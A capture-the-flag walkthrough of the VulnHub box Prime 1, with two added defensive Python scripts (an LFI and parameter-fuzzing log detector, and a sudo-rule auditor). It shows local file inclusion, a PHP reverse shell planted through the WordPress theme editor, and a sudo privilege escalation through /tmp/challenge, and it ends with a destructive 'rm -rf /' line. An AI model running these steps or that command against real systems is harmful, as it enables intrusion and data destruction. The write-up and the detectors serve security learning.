lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
syslog:x:104:108::/home/syslog:/bin/false
_apt:x:105:65534::/nonexistent:/bin/false
messagebus:x:106:110::/var/run/dbus:/bin/false
uuidd:x:107:111::/run/uuidd:/bin/false
lightdm:x:108:114:Light Display Manager:/var/lib/lightdm:/bin/false
whoopsie:x:109:117::/nonexistent:/bin/false
avahi-autoipd:x:110:119:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/bin/false
avahi:x:111:120:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false
dnsmasq:x:112:65534:dnsmasq,,,:/var/lib/misc:/bin/false
colord:x:113:123:colord colour management daemon,,,:/var/lib/colord:/bin/false
speech-dispatcher:x:114:29:Speech Dispatcher,,,:/var/run/speech-dispatcher:/bin/false
hplip:x:115:7:HPLIP system user,,,:/var/run/hplip:/bin/false
kernoops:x:116:65534:Kernel Oops Tracking Daemon,,,:/:/bin/false
pulse:x:117:124:PulseAudio daemon,,,:/var/run/pulse:/bin/false
rtkit:x:118:126:RealtimeKit,,,:/proc:/bin/false
saned:x:119:127::/var/lib/saned:/bin/false
usbmux:x:120:46:usbmux daemon,,,:/var/lib/usbmux:/bin/false
victor:x:1000:1000:victor,,,:/home/victor:/bin/bash
mysql:x:121:129:MySQL Server,,,:/nonexistent:/bin/false
saket:x:1001:1001:find password.txt file in my directory:/home/saket:
sshd:x:122:65534::/var/run/sshd:/usr/sbin/nologin
</html>
GET /image.php?secrettier360=/home/saket/password.txt HTTP/1.1
Host: 192.168.1.237
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
HTTP/1.1 200 OK
Date: Tue, 25 May 2021 11:39:22 GMT
Server: Apache/2.4.18 (Ubuntu)
Vary: Accept-Encoding
Content-Length: 215
Connection: close
Content-Type: text/html; charset=UTF-8
<html>
<title>HacknPentest</title>
<body>
<img src='hacknpentest.png' alt='hnp security' width="1300" height="595" /></p></p></p>
</body>
finaly you got the right parameter<br><br><br><br>follow_the_ippsec
</html>
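From the server side, the two things that just happened (a parameter-name fuzz burst against image.php, then a parameter that reads /etc/passwd and /home/saket/password.txt) both show up plainly in the Apache access log. The script below is an added example, not part of the original writeup or the box; it parses combined-format access log lines, flags parameter values that look like local-file-inclusion attempts, and flags clients that probe many distinct parameter names against one script in a short window. The log lines are constructed for the example; only the paths and the parameter names file and secrettier360 come from the writeup.

```python
"""Detect LFI values and parameter-name fuzzing in Apache combined-format access logs.

Added example for the Prime 1 writeup; the log lines in _sample_log() are
constructed, not captured from the box.
"""
import re
from collections import defaultdict
from datetime import datetime
from urllib.parse import urlsplit, parse_qsl, unquote

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"

# Substrings that indicate an attempt to drive an include()/fopen() sink at local files.
LFI_MARKERS = ("/etc/passwd", "/etc/shadow", "../", "..\\", "php://", "file://", "/proc/self/")


def parse_line(line):
    """Parse one access-log line into a dict, or return None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m.group("target"))
    # keep_blank_values so that "?file=" still counts as a probed parameter name.
    params = parse_qsl(parts.query, keep_blank_values=True)
    return {
        "ip": m.group("ip"),
        "ts": datetime.strptime(m.group("ts"), TS_FMT),
        "method": m.group("method"),
        "path": parts.path,
        # parse_qsl already decodes once; the extra unquote also catches double-encoded values.
        "params": [(k, unquote(v)) for k, v in params],
        "status": int(m.group("status")),
    }


def lfi_hits(entries):
    """Return (ip, path, param, value) for every parameter value that carries an LFI marker.

    An absolute path as a value is also flagged: /home/saket/password.txt contains no
    marker but is exactly what a working file-read parameter gets fed. Tune for your app.
    """
    hits = []
    for e in entries:
        for k, v in e["params"]:
            lowered = v.lower()
            if v.startswith("/") or any(mk in lowered for mk in LFI_MARKERS):
                hits.append((e["ip"], e["path"], k, v))
    return hits


def fuzzing_clients(entries, window_seconds=60, min_distinct_params=20):
    """Return {(ip, path): n} for clients that used at least min_distinct_params different
    parameter names against one script inside a sliding window of window_seconds."""
    by_key = defaultdict(list)  # (ip, path) -> [(ts, param_name), ...]
    for e in entries:
        for k, _ in e["params"]:
            by_key[(e["ip"], e["path"])].append((e["ts"], k))
    flagged = {}
    for key, events in by_key.items():
        events.sort()
        start = 0
        for end in range(len(events)):
            while (events[end][0] - events[start][0]).total_seconds() > window_seconds:
                start += 1
            distinct = {name for _, name in events[start:end + 1]}
            if len(distinct) >= min_distinct_params:
                flagged[key] = max(flagged.get(key, 0), len(distinct))
    return flagged


def analyse(lines):
    """Run both detectors over raw log lines; unparseable lines are skipped."""
    entries = [e for e in (parse_line(ln) for ln in lines) if e]
    return lfi_hits(entries), fuzzing_clients(entries)


def _sample_log():
    """Constructed sample: a 25-name fuzz burst on image.php, then the LFI requests."""
    base = '192.168.1.210 - - [25/May/2021:11:{m:02d}:{s:02d} +0000] "GET {target} HTTP/1.1" 200 {size}'
    names = ["id", "page", "name", "q", "file", "path", "dir", "view", "cat", "lang",
             "action", "type", "src", "url", "img", "doc", "load", "show", "read", "tpl",
             "inc", "include", "p", "f", "x"]  # constructed parameter-name wordlist slice
    lines = [base.format(m=30, s=i, target=f"/image.php?{n}=./secret.txt", size=147)
             for i, n in enumerate(names)]
    lines.append(base.format(m=37, s=19, target="/image.php?secrettier360=location.txt", size=197))
    lines.append(base.format(m=37, s=27, target="/image.php?secrettier360=%2Fetc%2Fpasswd", size=2616))
    lines.append(base.format(m=39, s=22, target="/image.php?secrettier360=/home/saket/password.txt", size=215))
    lines.append('10.0.0.5 - - [25/May/2021:11:40:00 +0000] "GET /wordpress/?p=1 HTTP/1.1" 200 11000')
    return lines


if __name__ == "__main__":
    hits, fuzzers = analyse(_sample_log())
    for h in hits:
        print("LFI attempt:", h)
    for (ip, path), n in fuzzers.items():
        print(f"parameter fuzzing: {ip} probed {n} parameter names on {path}")
```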
## Can log in with victor:follow_the_ippsec at WordPress
Let's try a plugin upload
┌──(root💀kali)-[/opt/vulnhub/prime1]
└─# locate shell.zip
/opt/htb/blocky/shell.zip
/opt/htb/spectra/shell.zip
/opt/thm/wekor/shell.zip
/opt/vulnhub/shenron2/shell.zip
/opt/vulnhub/shenron3/shell.zip
/root/.local/share/Trash/files/shell.zip
/root/.local/share/Trash/info/shell.zip.trashinfo
┌──(root💀kali)-[/opt/vulnhub/prime1]
└─# cp /opt/vulnhub/shenron2/shell.zip .
┌──(root💀kali)-[/opt/vulnhub/prime1]
└─# ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 192.168.1.210 netmask 255.255.255.0 broadcast 192.168.1.255
inet6 fe80::a00:27ff:fe4a:6d7a prefixlen 64 scopeid 0x20<link>
ether 08:00:27:4a:6d:7a txqueuelen 1000 (Ethernet)
RX packets 14671770 bytes 6921536577 (6.4 GiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 13778458 bytes 2110013880 (1.9 GiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
inet6 ::1 prefixlen 128 scopeid 0x10<host>
loop txqueuelen 1000 (Local Loopback)
RX packets 1369 bytes 2519405 (2.4 MiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 1369 bytes 2519405 (2.4 MiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
mpqemubr0: flags=4099<UP,BROADCAST,MULTICAST> mtu 1500
inet 10.239.197.1 netmask 255.255.255.0 broadcast 10.239.197.255
ether 52:54:00:50:6b:a5 txqueuelen 1000 (Ethernet)
RX packets 0 bytes 0 (0.0 B)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 0 bytes 0 (0.0 B)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
┌──(root💀kali)-[/opt/vulnhub/prime1]
└─# nano shell.zip
┌──(root💀kali)-[/opt/vulnhub/prime1]
└─# unzip shell.zip
Archive: shell.zip
inflating: plugin_shell.php
┌──(root💀kali)-[/opt/vulnhub/prime1]
└─# nano plugin_shell.php
┌──(root💀kali)-[/opt/vulnhub/prime1]
└─# rm shell.zip
┌──(root💀kali)-[/opt/vulnhub/prime1]
└─# zip shell.zip plugin_shell.php
adding: plugin_shell.php (deflated 31%)
Unable to create directory wp-content/uploads/2021/05. Is its parent directory writable by the server?
## Does not work; how about theme editing?
http://192.168.1.237/wordpress/wp-admin/theme-editor.php?file=secret.php&theme=twentynineteen
/* Ohh Finaly you got a writable file */
Paste in /usr/share/webshells/php/php-reverse-shell.php and change the IP to the listener's address (192.168.1.210 from the ifconfig above).
Go to http://192.168.1.237/wordpress/wp-content/themes/twentynineteen/secret.php
## Shell
┌──(root💀kali)-[/opt/vulnhub/prime1]
└─# nc -nvlp 1234
listening on [any] 1234 ...
connect to [192.168.1.210] from (UNKNOWN) [192.168.1.237] 35374
Linux ubuntu 4.10.0-28-generic #32~16.04.2-Ubuntu SMP Thu Jul 20 10:19:48 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
04:47:56 up 58 min, 0 users, load average: 0.14, 5.37, 18.34
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: cant access tty; job control turned off
$ python3 -c 'import pty;pty.spawn("/bin/bash");'
www-data@ubuntu:/$
www-data@ubuntu:/$ su saket
su saket
Password: follow_the_ippsec
su: Authentication failure
www-data@ubuntu:/$ su victor
su victor
Password: follow_the_ippsec
su: Authentication failure
www-data@ubuntu:/$ sudo -l
sudo -l
Matching Defaults entries for www-data on ubuntu:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User www-data may run the following commands on ubuntu:
(root) NOPASSWD: /home/saket/enc
www-data@ubuntu:/$ file /home/saket/enc
file /home/saket/enc
/home/saket/enc: executable, regular file, no read permission
www-data@ubuntu:/$
cd /home/saket
www-data@ubuntu:/home/saket$ ls -lash
ls -lash
total 36K
4.0K drwxr-xr-x 2 root root 4.0K Aug 31 2019 .
4.0K drwxr-xr-x 4 root root 4.0K Aug 29 2019 ..
4.0K -rw------- 1 root root 20 Aug 31 2019 .bash_history
16K -rwxr-x--x 1 root root 14K Aug 30 2019 enc
4.0K -rw-r--r-- 1 root root 18 Aug 29 2019 password.txt
4.0K -rw-r--r-- 1 root root 33 Aug 31 2019 user.txt
www-data@ubuntu:/home/saket$ cat user.txt
cat user.txt
af3c658dcf9d7190da3153519c003456
www-data@ubuntu:/home/saket$ sudo -u root /home/saket/enc
sudo -u root /home/saket/enc
enter password: follow_the_ippsec
follow_the_ippsec
## nothing
www-data@ubuntu:/home/victor$ cd /
cd /
www-data@ubuntu:/$ ls -lash
ls -lash
total 108K
4.0K drwxr-xr-x 24 root root 4.0K Aug 29 2019 .
4.0K drwxr-xr-x 24 root root 4.0K Aug 29 2019 ..
4.0K drwxr-xr-x 2 root root 4.0K May 25 03:48 bin
4.0K drwxr-xr-x 3 root root 4.0K May 25 03:48 boot
4.0K drwxrwxr-x 2 root root 4.0K Aug 29 2019 cdrom
0 drwxr-xr-x 18 root root 3.9K May 25 03:49 dev
12K drwxr-xr-x 136 root root 12K May 25 03:48 etc
4.0K drwxr-xr-x 4 root root 4.0K Aug 29 2019 home
0 lrwxrwxrwx 1 root root 33 Aug 29 2019 initrd.img -> boot/initrd.img-4.10.0-28-generic
4.0K drwxr-xr-x 22 root root 4.0K Aug 29 2019 lib
4.0K drwxr-xr-x 2 root root 4.0K May 25 03:46 lib64
16K drwx------ 2 root root 16K Aug 29 2019 lost+found
4.0K drwxr-xr-x 3 root root 4.0K Aug 1 2017 media
4.0K drwxr-xr-x 2 root root 4.0K Aug 1 2017 mnt
4.0K drwxr-xr-x 3 root root 4.0K Aug 30 2019 opt
0 dr-xr-xr-x 143 root root 0 May 25 03:49 proc
4.0K drwx------ 5 root root 4.0K Aug 31 2019 root
0 drwxr-xr-x 26 root root 800 May 25 03:49 run
12K drwxr-xr-x 2 root root 12K May 25 03:48 sbin
4.0K drwxr-xr-x 2 root root 4.0K May 25 03:49 snap
4.0K drwxr-xr-x 2 root root 4.0K Aug 1 2017 srv
0 dr-xr-xr-x 13 root root 0 May 25 03:49 sys
4.0K drwxrwxrwt 11 root root 4.0K May 25 05:02 tmp
4.0K drwxr-xr-x 11 root root 4.0K Aug 1 2017 usr
4.0K drwxr-xr-x 15 root root 4.0K Aug 29 2019 var
0 lrwxrwxrwx 1 root root 30 Aug 29 2019 vmlinuz -> boot/vmlinuz-4.10.0-28-generic
www-data@ubuntu:/$ ls -lash /opt
ls -lash /opt
total 12K
4.0K drwxr-xr-x 3 root root 4.0K Aug 30 2019 .
4.0K drwxr-xr-x 24 root root 4.0K Aug 29 2019 ..
4.0K drwxr-xr-x 3 root root 4.0K Aug 30 2019 backup
www-data@ubuntu:/$ cd opt
cd opt
www-data@ubuntu:/opt$ cd backup
cd backup
www-data@ubuntu:/opt/backup$ ls -lash
ls -lash
total 12K
4.0K drwxr-xr-x 3 root root 4.0K Aug 30 2019 .
4.0K drwxr-xr-x 3 root root 4.0K Aug 30 2019 ..
4.0K drwxr-xr-x 2 root root 4.0K Aug 30 2019 server_database
www-data@ubuntu:/opt/backup$ cd ser
cd server_database/
www-data@ubuntu:/opt/backup/server_database$ ls -alsh
ls -alsh
total 12K
4.0K drwxr-xr-x 2 root root 4.0K Aug 30 2019 .
4.0K drwxr-xr-x 3 root root 4.0K Aug 30 2019 ..
4.0K -rw-r--r-- 1 root root 75 Aug 30 2019 backup_pass
0 -rw-r--r-- 1 root root 0 Aug 30 2019 {hello.8}
www-data@ubuntu:/opt/backup/server_database$ cat ba
cat backup_pass
your password for backup_database file enc is
"backup_password"
Enjoy!
www-data@ubuntu:/opt/backup/server_database$ file {hello.8}
file {hello.8}
{hello.8}: empty
www-data@ubuntu:/opt/backup/server_database$ sudo -u root /home/saket/enc
sudo -u root /home/saket/enc
enter password: backup_password
backup_password
good
www-data@ubuntu:/opt/backup/server_database$ cd /home/saket
cd /home/saket
www-data@ubuntu:/home/saket$ ls -lash
ls -lash
total 44K
4.0K drwxr-xr-x 2 root root 4.0K May 25 05:04 .
4.0K drwxr-xr-x 4 root root 4.0K Aug 29 2019 ..
4.0K -rw------- 1 root root 20 Aug 31 2019 .bash_history
16K -rwxr-x--x 1 root root 14K Aug 30 2019 enc
4.0K -rw-r--r-- 1 root root 237 May 25 05:04 enc.txt
4.0K -rw-r--r-- 1 root root 123 May 25 05:04 key.txt
4.0K -rw-r--r-- 1 root root 18 Aug 29 2019 password.txt
4.0K -rw-r--r-- 1 root root 33 Aug 31 2019 user.txt
www-data@ubuntu:/home/saket$ cat enc.txt
cat enc.txt
nzE+iKr82Kh8BOQg0k/LViTZJup+9DReAsXd/PCtFZP5FHM7WtJ9Nz1NmqMi9G0i7rGIvhK2jRcGnFyWDT9MLoJvY1gZKI2xsUuS3nJ/n3T1Pe//4kKId+B3wfDW/TgqX6Hg/kUj8JO08wGe9JxtOEJ6XJA3cO/cSna9v3YVf/ssHTbXkb+bFgY7WLdHJyvF6lD/wfpY2ZnA1787ajtm+/aWWVMxDOwKuqIT1ZZ0Nw4=
www-data@ubuntu:/home/saket$ cat key.txt
cat key.txt
I know you are the fan of ippsec.
So convert string "ippsec" into md5 hash and use it to gain yourself in your real form.
https://www.devglan.com/online-tools/aes-encryption-decryption
## Decrypting enc.txt with the AES tool above, using the md5 of "ippsec" as the key, gives:
Dont worry saket one day we will reach toour destination very soon. And if you forget your username then use your old password==> "tribute_to_ippsec"Victor,
www-data@ubuntu:/home/saket$ su saket
su saket
Password: tribute_to_ippsec
saket@ubuntu:~$ sudo -l
sudo -l
Matching Defaults entries for saket on ubuntu:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User saket may run the following commands on ubuntu:
(root) NOPASSWD: /home/victor/undefeated_victor
saket@ubuntu:~$ file /home/victor/undefeated_victor
file /home/victor/undefeated_victor
/home/victor/undefeated_victor: setuid executable, regular file, no read permission
saket@ubuntu:~$ sudo -u root /home/victor/undefeated_victor
sudo -u root /home/victor/undefeated_victor
if you can defeat me then challenge me in front of you
/home/victor/undefeated_victor: 2: /home/victor/undefeated_victor: /tmp/challenge: not found
saket@ubuntu:~$ cd /home/victor
cd /home/victor
saket@ubuntu:/home/victor$ ls -lash
ls -lash
ls: cannot open directory '.': Permission denied
saket@ubuntu:/home/victor$ echo fuckyou > /tmp/challenge
echo fuckyou > /tmp/challenge
saket@ubuntu:/home/victor$ sudo -u root /home/victor/undefeated_victor
sudo -u root /home/victor/undefeated_victor
if you can defeat me then challenge me in front of you
/home/victor/undefeated_victor: 2: /home/victor/undefeated_victor: /tmp/challenge: Permission denied
saket@ubuntu:/home/victor$ ls -lash /tmp
ls -lash /tmp
total 52K
4.0K drwxrwxrwt 11 root root 4.0K May 25 05:17 .
4.0K drwxr-xr-x 24 root root 4.0K Aug 29 2019 ..
4.0K -rw-rw-r-- 1 saket saket 8 May 25 05:17 challenge
4.0K drwxrwxrwt 2 root root 4.0K May 25 03:49 .font-unix
4.0K drwxrwxrwt 2 root root 4.0K May 25 03:49 .ICE-unix
4.0K drwx------ 3 root root 4.0K May 25 03:49 systemd-private-2a0f1cb6de0f42d8a22c7e1399dcb7ef-colord.service-gxFdBJ
4.0K drwx------ 3 root root 4.0K May 25 03:49 systemd-private-2a0f1cb6de0f42d8a22c7e1399dcb7ef-rtkit-daemon.service-tbGxx5
4.0K drwx------ 3 root root 4.0K May 25 03:49 systemd-private-2a0f1cb6de0f42d8a22c7e1399dcb7ef-systemd-timesyncd.service-LK4qDN
4.0K drwxrwxrwt 2 root root 4.0K May 25 03:49 .Test-unix
4.0K drwxrwxrwt 2 root root 4.0K May 25 03:49 VMwareDnD
4.0K -r--r--r-- 1 root root 11 May 25 03:49 .X0-lock
4.0K drwxrwxrwt 2 root root 4.0K May 25 03:49 .X11-unix
4.0K drwxrwxrwt 2 root root 4.0K May 25 03:49 .XIM-unix
saket@ubuntu:/home/victor$ chmod +x /tmp/challenge
chmod +x /tmp/challenge
saket@ubuntu:/home/victor$ sudo -u root /home/victor/undefeated_victor
sudo -u root /home/victor/undefeated_victor
if you can defeat me then challenge me in front of you
/tmp/challenge: 1: /tmp/challenge: fuckyou: not found
saket@ubuntu:/home/victor$ rm /tmp/challenge
rm /tmp/challenge
saket@ubuntu:/home/victor$ echo sh > /tmp/challenge
echo sh > /tmp/challenge
saket@ubuntu:/home/victor$ chmod +x /tmp/challenge
chmod +x /tmp/challenge
saket@ubuntu:/home/victor$ sudo -u root /home/victor/undefeated_victor
sudo -u root /home/victor/undefeated_victor
if you can defeat me then challenge me in front of you
# id
id
uid=0(root) gid=0(root) groups=0(root)
# cd /root
cd /root
# ls -lash
ls -lash
total 92K
4.0K drwx------ 5 root root 4.0K Aug 31 2019 .
4.0K drwxr-xr-x 24 root root 4.0K Aug 29 2019 ..
12K -rw------- 1 root root 8.4K Sep 1 2019 .bash_history
4.0K -rw-r--r-- 1 root root 3.1K Oct 22 2015 .bashrc
4.0K drwx------ 3 root root 4.0K Aug 30 2019 .cache
16K -rwxr-xr-x 1 root root 14K Aug 30 2019 enc
4.0K -rw-r--r-- 1 root root 305 Aug 30 2019 enc.cpp
4.0K -rw-r--r-- 1 root root 237 Aug 30 2019 enc.txt
4.0K -rw-r--r-- 1 root root 123 Aug 30 2019 key.txt
4.0K -rw------- 1 root root 137 Aug 30 2019 .mysql_history
4.0K drwxr-xr-x 2 root root 4.0K Aug 29 2019 .nano
4.0K -rw-r--r-- 1 root root 148 Aug 17 2015 .profile
4.0K -rw-r--r-- 1 root root 33 Aug 30 2019 root.txt
4.0K -rw-r--r-- 1 root root 66 Aug 31 2019 .selected_editor
4.0K -rw-r--r-- 1 root root 805 Aug 30 2019 sql.py
4.0K -rwxr-xr-x 1 root root 442 Aug 31 2019 t.sh
4.0K drwxr-xr-x 10 root root 4.0K Aug 30 2019 wfuzz
4.0K -rw-r--r-- 1 root root 170 Aug 29 2019 wordpress.sql
# id;hostname;date
id;hostname;date
uid=0(root) gid=0(root) groups=0(root)
ubuntu
Tue May 25 05:18:41 PDT 2021
# cat root.txt
cat root.txt
b2b17036da1de94cfb024540a8e7075a
# exit
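The root step above works because a NOPASSWD sudo rule points at a script in a user's home that executes /tmp/challenge, a path anyone can create. As an added example (not from the original writeup), this is a small audit of `sudo -l` output and of a script body for exactly that pattern; the `sudo -l` sample is constructed in the shape shown on this page, and the wrapper body is hypothetical, reconstructed only from the dash error messages the page prints (the real binary is unreadable).

```python
import os
import re

# Constructed sample in the shape of the `sudo -l` output shown in this walkthrough.
SUDO_L = """\
Matching Defaults entries for saket on ubuntu:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin\\:/snap/bin
User saket may run the following commands on ubuntu:
    (root) NOPASSWD: /home/victor/undefeated_victor
    (root) /usr/bin/apt-get
"""

# Hypothetical body of a wrapper like undefeated_victor: the real file is unreadable,
# so this is reconstructed only from the dash errors on the page (line 2 runs /tmp/challenge).
WRAPPER = """\
#!/bin/sh
echo "if you can defeat me then challenge me in front of you"
/tmp/challenge
"""

RULE_RE = re.compile(r'^\s*\((?P<runas>[^)]+)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmd>/\S+)')
WRITABLE_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/", "/home/")
WRITABLE_REF = re.compile(r'(?<![\w/])/(?:tmp|var/tmp|dev/shm)/\S+')

def parse_secure_path(text):
    """Return the secure_path entries; sudo prints the colons escaped as backslash-colon."""
    m = re.search(r'secure_path=(\S+)', text)
    return [p for p in m.group(1).replace('\\:', ':').split(':') if p] if m else []

def audit_sudo_rules(text):
    """Flag command rules that are NOPASSWD, outside secure_path, or under a user-writable tree."""
    secure = parse_secure_path(text)
    findings = []
    for line in text.splitlines():
        m = RULE_RE.match(line)
        if not m:
            continue
        cmd, reasons = m.group("cmd"), []
        if "NOPASSWD" in m.group("tags"):
            reasons.append("NOPASSWD")
        if os.path.dirname(cmd) not in secure:
            reasons.append("outside secure_path")
        if cmd.startswith(WRITABLE_DIRS):
            reasons.append("in a user-controlled directory")
        if reasons:
            findings.append((cmd, reasons))
    return findings

def find_writable_invocations(script_text):
    """Paths a privileged script executes from world-writable locations (the /tmp/challenge pattern)."""
    return WRITABLE_REF.findall(script_text)
```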
## rm -rf / --no-preserve-root